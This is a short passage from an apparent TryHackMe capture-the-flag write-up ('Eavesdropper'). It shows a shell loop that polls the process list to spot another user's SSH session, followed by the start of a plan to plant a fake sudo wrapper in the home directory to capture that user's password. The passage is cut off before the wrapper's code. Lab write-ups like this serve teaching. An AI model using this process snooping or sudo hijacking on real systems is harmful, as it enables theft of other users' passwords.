mwierszycki/mwierszycki.github.io/THMwriteups/Eavesdropper.md

 `$ while true; do sleep 0.01; ps auxe | grep SSH_CLIENT=172.xx.xx.xx | grep -v grep > process.out ; done`

-The sudo is called via ssh - it looks like a password is given at 172.xx.xx.xx when the command is executed.
+The sudo is run via ssh - it looks like a password is given at 172.xx.xx.xx when the command is executed.
 Create sudo wrapper in HOME:

 ```
 $ cat sudo